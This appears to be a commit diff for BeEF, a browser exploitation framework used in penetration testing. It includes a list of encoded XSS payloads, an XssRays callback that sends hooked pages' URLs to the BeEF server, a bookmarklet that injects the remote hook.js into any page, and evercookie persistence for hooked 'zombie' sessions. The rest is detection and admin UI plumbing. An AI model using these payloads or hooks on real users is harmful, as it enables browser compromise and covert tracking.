{input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true}, {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true} {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
// {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true}, {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
// {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true}, {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true}, {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
// {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true}, {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true}, {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true}, {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true}, {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
// util function. Print string to the console only if the debug flag is on and the browser is not IE. // util function. Print string to the console only if the debug flag is on and the browser is not IE.
printDebug:function(log) { printDebug:function(log) {
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) { if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
console.log("[XssRays] " + log); beef.debug("[XssRays] " + log);
} }
}, },
@@ -340,8 +338,8 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl; beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method; beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'"; + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback); exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -368,7 +366,7 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method; beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'"; + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback); exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -424,7 +422,7 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method; beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'"; + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback)); exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
form += '<textarea name="' + i + '">' + exploit + '<\/textarea>'; form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

15
core/main/client/session.js
View File

@@ -13,7 +13,8 @@ beef.session = {
hook_session_id_length: 80, hook_session_id_length: 80,
hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
ec: new evercookie(), ec: new evercookie(),
beefhook: "<%= @hook_session_name %>",
/** /**
* Gets a string which will be used to identify the hooked browser session * Gets a string which will be used to identify the hooked browser session
@@ -22,12 +23,12 @@ beef.session = {
*/ */
get_hook_session_id: function() { get_hook_session_id: function() {
// check if the browser is already known to the framework // check if the browser is already known to the framework
var id = this.ec.evercookie_cookie("BEEFHOOK"); var id = this.ec.evercookie_cookie(beef.session.beefhook);
if (typeof id == 'undefined') { if (typeof id == 'undefined') {
var id = this.ec.evercookie_userdata("BEEFHOOK"); var id = this.ec.evercookie_userdata(beef.session.beefhook);
} }
if (typeof id == 'undefined') { if (typeof id == 'undefined') {
var id = this.ec.evercookie_window("BEEFHOOK"); var id = this.ec.evercookie_window(beef.session.beefhook);
} }
// if the browser is not known create a hook session id and set it // if the browser is not known create a hook session id and set it
@@ -47,9 +48,9 @@ beef.session = {
*/ */
set_hook_session_id: function(id) { set_hook_session_id: function(id) {
// persist the hook session id // persist the hook session id
this.ec.evercookie_cookie("BEEFHOOK", id); this.ec.evercookie_cookie(beef.session.beefhook, id);
this.ec.evercookie_userdata("BEEFHOOK", id); this.ec.evercookie_userdata(beef.session.beefhook, id);
this.ec.evercookie_window("BEEFHOOK", id); this.ec.evercookie_window(beef.session.beefhook, id);
}, },
/** /**

3
core/main/client/updater.js
View File

@@ -15,6 +15,7 @@ beef.updater = {
// XHR-polling timeout. // XHR-polling timeout.
xhr_poll_timeout: "<%= @xhr_poll_timeout %>", xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
beefhook: "<%= @hook_session_name %>",
// A lock. // A lock.
lock: false, lock: false,
@@ -57,7 +58,7 @@ beef.updater = {
get_commands: function() { get_commands: function() {
try { try {
this.lock = true; this.lock = true;
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) { beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
if (response.body != null && response.body.length > 0) if (response.body != null && response.body.length > 0)
beef.updater.execute_commands(); beef.updater.execute_commands();
}); });

4
core/main/constants/hardware.rb
View File

@@ -34,8 +34,8 @@ module Constants
HW_HTC_IMG = 'htc.ico' HW_HTC_IMG = 'htc.ico'
HW_MOTOROLA_UA_STR = 'motorola' HW_MOTOROLA_UA_STR = 'motorola'
HW_MOTOROLA_IMG = 'motorola.png' HW_MOTOROLA_IMG = 'motorola.png'
HW_GOOGLE_UA_STR = 'Nexus One' HW_GOOGLE_UA_STR = 'Nexus'
HE_GOOGLE_IM = 'nexus.png' HW_GOOGLE_IMG = 'nexus.png'
HW_ERICSSON_UA_STR = 'Ericsson' HW_ERICSSON_UA_STR = 'Ericsson'
HW_ERICSSON_IMG = 'sony_ericsson.png' HW_ERICSSON_IMG = 'sony_ericsson.png'
HW_ALL_UA_STR = 'All' HW_ALL_UA_STR = 'All'

8
core/main/handlers/browserdetails.rb
View File

@@ -255,6 +255,14 @@ module BeEF
self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection." self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
end end
# get and store the yes|no value for HasWebRTC
has_webrtc = get_param(@data['results'], 'HasWebRTC')
if BeEF::Filters.is_valid_yes_no?(has_webrtc)
BD.set(session_id, 'HasWebRTC', has_webrtc)
else
self.err_msg "Invalid value for HasWebRTC returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasActiveX # get and store the yes|no value for HasActiveX
has_activex = get_param(@data['results'], 'HasActiveX') has_activex = get_param(@data['results'], 'HasActiveX')
if BeEF::Filters.is_valid_yes_no?(has_activex) if BeEF::Filters.is_valid_yes_no?(has_activex)

7
core/main/handlers/hookedbrowsers.rb
View File

@@ -51,13 +51,18 @@ module Handlers
# @note is a known browser so send instructions # @note is a known browser so send instructions
else else
# @note Check if we haven't seen this browser for a while, log an event if we haven't
if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
end
# @note record the last poll from the browser # @note record the last poll from the browser
hooked_browser.lastseen = Time.new.to_i hooked_browser.lastseen = Time.new.to_i
# @note Check for a change in zombie IP and log an event # @note Check for a change in zombie IP and log an event
if config.get('beef.http.use_x_forward_for') == true if config.get('beef.http.use_x_forward_for') == true
if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"] if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}") BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"] hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
end end
else else

3
core/main/handlers/modules/beefjs.rb
View File

@@ -80,8 +80,9 @@ module BeEF
# @note set the XHR-polling timeout # @note set the XHR-polling timeout
hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout") hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
# @note set the hook file path # @note set the hook file path and BeEF's cookie name
hook_session_config['hook_file'] = config.get("beef.http.hook_file") hook_session_config['hook_file'] = config.get("beef.http.hook_file")
hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
# @note if http_port <> public_port in config ini, use the public_port # @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil? unless hook_session_config['beef_public_port'].nil?

2
core/main/models/browserdetails.rb
View File

@@ -80,6 +80,7 @@ module Models
return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil? return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
BeEF::Core::Constants::Os::OS_UNKNOWN_IMG BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
end end

22
core/main/router/router.rb
View File

@@ -81,16 +81,34 @@ module BeEF
case type case type
when "apache" when "apache"
headers "Server" => "Apache/2.2.3 (CentOS)", headers "Server" => "Apache/2.2.3 (CentOS)",
"Content-Type" => "text/html" "Content-Type" => "text/html; charset=UTF-8"
when "iis" when "iis"
headers "Server" => "Microsoft-IIS/6.0", headers "Server" => "Microsoft-IIS/6.0",
"X-Powered-By" => "ASP.NET", "X-Powered-By" => "ASP.NET",
"Content-Type" => "text/html" "Content-Type" => "text/html; charset=UTF-8"
else else
print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis." print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
end end
end end
# @note If CORS are enabled, expose the appropriate headers
# this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
# and be able to handle requests with a JSON content-type
if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
headers "Access-Control-Allow-Origin" => allowed_domains,
"Access-Control-Allow-Methods" => "POST, GET",
"Access-Control-Allow-Headers" => "Content-Type"
halt 200
end
# @note If CORS are enabled, expose the appropriate headers
if config.get("beef.http.restful_api.allow_cors")
allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
headers "Access-Control-Allow-Origin" => allowed_domains,
"Access-Control-Allow-Methods" => "POST, GET"
end
end end
# @note Default root page # @note Default root page

18
core/main/server.rb
View File

@@ -34,16 +34,18 @@ module BeEF
def to_h def to_h
{ {
'beef_version' => VERSION, 'beef_version' => VERSION,
'beef_url' => @url, 'beef_url' => @url,
'beef_root_dir' => @root_dir, 'beef_root_dir' => @root_dir,
'beef_host' => @configuration.get('beef.http.host'), 'beef_host' => @configuration.get('beef.http.host'),
'beef_port' => @configuration.get('beef.http.port'), 'beef_port' => @configuration.get('beef.http.port'),
'beef_public' => @configuration.get('beef.http.public'), 'beef_public' => @configuration.get('beef.http.public'),
'beef_public_port' => @configuration.get('beef.http.public_port'), 'beef_public_port' => @configuration.get('beef.http.public_port'),
'beef_dns' => @configuration.get('beef.http.dns'), 'beef_dns_host' => @configuration.get('beef.http.dns_host'),
'beef_hook' => @configuration.get('beef.http.hook_file'), 'beef_dns_port' => @configuration.get('beef.http.dns_port'),
'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http" 'beef_hook' => @configuration.get('beef.http.hook_file'),
'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
'client_debug' => @configuration.get("beef.client.debug")
} }
end end

1
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -86,6 +86,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
['Browser Components', 'Windows Media Player','HasWMP'], ['Browser Components', 'Windows Media Player','HasWMP'],
['Browser Components', 'VLC', 'HasVLC'], ['Browser Components', 'VLC', 'HasVLC'],
['Browser Components', 'Foxit Reader', 'HasFoxit'], ['Browser Components', 'Foxit Reader', 'HasFoxit'],
['Browser Components', 'WebRTC', 'HasWebRTC'],
['Browser Components', 'ActiveX', 'HasActiveX'], ['Browser Components', 'ActiveX', 'HasActiveX'],
['Browser Components', 'Session Cookies', 'hasSessionCookies'], ['Browser Components', 'Session Cookies', 'hasSessionCookies'],
['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'], ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],

2
extensions/admin_ui/controllers/panel/index.html
View File

@@ -60,6 +60,8 @@
<body> <body>
<%= nonce_tag %> <%= nonce_tag %>
<div id="header"> <div id="header">
<div class="left-menu" id="header-right">
</div>
<div class="right-menu"> <div class="right-menu">
<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" /> <img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" />
BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> | BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> |

2
extensions/admin_ui/controllers/panel/panel.rb
View File

@@ -88,6 +88,7 @@ module BeEF
has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket') has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears') has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled') has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
has_webrtc = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebRTC')
has_activex = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX') has_activex = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight') has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
has_quicktime = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime') has_quicktime = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
@@ -113,6 +114,7 @@ module BeEF
'has_web_sockets' => has_web_sockets, 'has_web_sockets' => has_web_sockets,
'has_googlegears' => has_googlegears, 'has_googlegears' => has_googlegears,
'has_java' => has_java, 'has_java' => has_java,
'has_webrtc' => has_webrtc,
'has_activex' => has_activex, 'has_activex' => has_activex,
'has_silverlight' => has_silverlight, 'has_silverlight' => has_silverlight,
'has_quicktime' => has_quicktime, 'has_quicktime' => has_quicktime,

13
extensions/admin_ui/media/css/base.css
View File

@@ -5,13 +5,24 @@
*/ */
#header .right-menu { #header .right-menu {
width: 300px;
float: right; float: right;
margin: 10px; margin: 3px 3px 0 4px;
word-spacing: 5px; word-spacing: 5px;
font: 11px arial, tahoma, verdana, helvetica; font: 11px arial, tahoma, verdana, helvetica;
color:#000; color:#000;
} }
#header .left-menu {
width: 300px;
float: left;
margin: 10px 4px 0 20px;
word-spacing: 5px;
font: 11px arial, tahoma, verdana, helvetica;
font-weight: bolder;
color:red;
}
#header a:link, #header a:link,
#header a:visited { #header a:visited {
color:#000; color:#000;

22
extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
View File

@@ -42,19 +42,39 @@ Ext.onReady(function() {
* This event updater retrieves updates every 8 seconds. Those updates * This event updater retrieves updates every 8 seconds. Those updates
* are then pushed to various managers (i.e. the zombie manager). * are then pushed to various managers (i.e. the zombie manager).
*/ */
var lastpoll = new Date().getTime();
Ext.TaskMgr.start({ Ext.TaskMgr.start({
run: function() { run: function() {
Ext.Ajax.request({ Ext.Ajax.request({
url: '/ui/panel/hooked-browser-tree-update.json', url: '/ui/panel/hooked-browser-tree-update.json',
method: 'POST', method: 'POST',
success: function(response) { success: function(response) {
var updates = Ext.util.JSON.decode(response.responseText); var updates;
try {
updates = Ext.util.JSON.decode(response.responseText);
} catch (e) {
//The framework has probably been reset and you're actually logged out
var hr = document.getElementById("header-right");
hr.innerHTML = "You appear to be logged out. <a href='/ui/panel/'>Login</a>";
}
var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null; var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null;
var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null; var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null;
if(zombiesManager && hooked_browsers) { if(zombiesManager && hooked_browsers) {
zombiesManager.updateZombies(hooked_browsers, distributed_engine_rules); zombiesManager.updateZombies(hooked_browsers, distributed_engine_rules);
} }
lastpoll = new Date().getTime();
var hr = document.getElementById("header-right");
hr.innerHTML = "";
},
failure: function(response) {
var timenow = new Date().getTime();
if ((timenow - lastpoll) > 60000) {
var hr = document.getElementById("header-right");
hr.innerHTML = "Framework is down";
}
} }
}); });
}, },

9
extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
View File

@@ -6,6 +6,10 @@
WelcomeTab = function() { WelcomeTab = function() {
var hookURL = location.protocol+'%2f%2f'+location.hostname+(location.port ? ':'+location.port : '')+'%2fhook.js';
var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27__HOOKURL__%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"
bookmarklet = bookmarklet.replace(/__HOOKURL__/,hookURL);
welcome = " \ welcome = " \
<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \ <div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
<p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \ <p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
@@ -13,6 +17,7 @@ WelcomeTab = function() {
<p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\ <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
<p>Welcome to BeEF!</p><br /> \ <p>Welcome to BeEF!</p><br /> \
<p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \ <p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \
<p>If you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link into your browser's bookmark bar, then simply click the shortcut on another page: <a href='__BOOKMARKLETURL__'>Hook Me!</a></p><br /> \
<p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \ <p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \
<p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\ <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\
<p>To interact with a hooked browser simply left-click it, a new tab will appear. \ <p>To interact with a hooked browser simply left-click it, a new tab will appear. \
@@ -46,7 +51,9 @@ WelcomeTab = function() {
</div>\ </div>\
"; ";
WelcomeTab.superclass.constructor.call(this, { welcome = welcome.replace(/__BOOKMARKLETURL__/,bookmarklet);
WelcomeTab.superclass.constructor.call(this, {
region:'center', region:'center',
padding:'10 10 10 10', padding:'10 10 10 10',
html: welcome, html: welcome,

18
extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
View File

@@ -27,10 +27,11 @@ var ZombiesMgr = function(zombies_tree_lists) {
var has_web_sockets = zombie_array[index]["has_web_sockets"]; var has_web_sockets = zombie_array[index]["has_web_sockets"];
var has_googlegears = zombie_array[index]["has_googlegears"]; var has_googlegears = zombie_array[index]["has_googlegears"];
var has_java = zombie_array[index]["has_java"]; var has_java = zombie_array[index]["has_java"];
var has_webrtc = zombie_array[index]["has_webrtc"];
var has_activex = zombie_array[index]["has_activex"]; var has_activex = zombie_array[index]["has_activex"];
var has_wmp = zombie_array[index]["has_wmp"]; var has_wmp = zombie_array[index]["has_wmp"];
var has_vlc = zombie_array[index]["has_vlc"]; var has_vlc = zombie_array[index]["has_vlc"];
var has_foxit = zombie_array[index]["has_foxit"]; var has_foxit = zombie_array[index]["has_foxit"];
var has_silverlight = zombie_array[index]["has_silverlight"]; var has_silverlight = zombie_array[index]["has_silverlight"];
var has_quicktime = zombie_array[index]["has_quicktime"]; var has_quicktime = zombie_array[index]["has_quicktime"];
var has_realplayer = zombie_array[index]["has_realplayer"]; var has_realplayer = zombie_array[index]["has_realplayer"];
@@ -47,14 +48,15 @@ var ZombiesMgr = function(zombies_tree_lists) {
balloon_text+= "<br/>Hardware: " + hw_name; balloon_text+= "<br/>Hardware: " + hw_name;
balloon_text+= "<br/>Domain: " + domain + ":" + port; balloon_text+= "<br/>Domain: " + domain + ":" + port;
balloon_text+= "<br/>Flash: " + has_flash; balloon_text+= "<br/>Flash: " + has_flash;
balloon_text+= "<br/>Java: " + has_java; balloon_text+= "<br/>Java: " + has_java;
balloon_text+= "<br/>Web Sockets: " + has_web_sockets; balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
balloon_text+= "<br/>WebRTC: " + has_webrtc;
balloon_text+= "<br/>ActiveX: " + has_activex; balloon_text+= "<br/>ActiveX: " + has_activex;
balloon_text+= "<br/>Silverlight: " + has_silverlight; balloon_text+= "<br/>Silverlight: " + has_silverlight;
balloon_text+= "<br/>QuickTime: " + has_quicktime; balloon_text+= "<br/>QuickTime: " + has_quicktime;
balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp; balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp;
balloon_text+= "<br/>VLC: " + has_vlc; balloon_text+= "<br/>VLC: " + has_vlc;
balloon_text+= "<br/>Foxit: " + has_foxit; balloon_text+= "<br/>Foxit: " + has_foxit;
balloon_text+= "<br/>RealPlayer: " + has_realplayer; balloon_text+= "<br/>RealPlayer: " + has_realplayer;
balloon_text+= "<br/>Google Gears: " + has_googlegears; balloon_text+= "<br/>Google Gears: " + has_googlegears;
balloon_text+= "<br/>Date: " + date_stamp; balloon_text+= "<br/>Date: " + date_stamp;
@@ -67,7 +69,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
'balloon_text' : balloon_text, 'balloon_text' : balloon_text,
'check' : false, 'check' : false,
'domain' : domain, 'domain' : domain,
'port' : port 'port' : port
}; };
return new_zombie; return new_zombie;

20
extensions/admin_ui/media/javascript/ui/panel/common.js
View File

@@ -249,12 +249,24 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value); html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
html += '<p>'; html += '<p>';
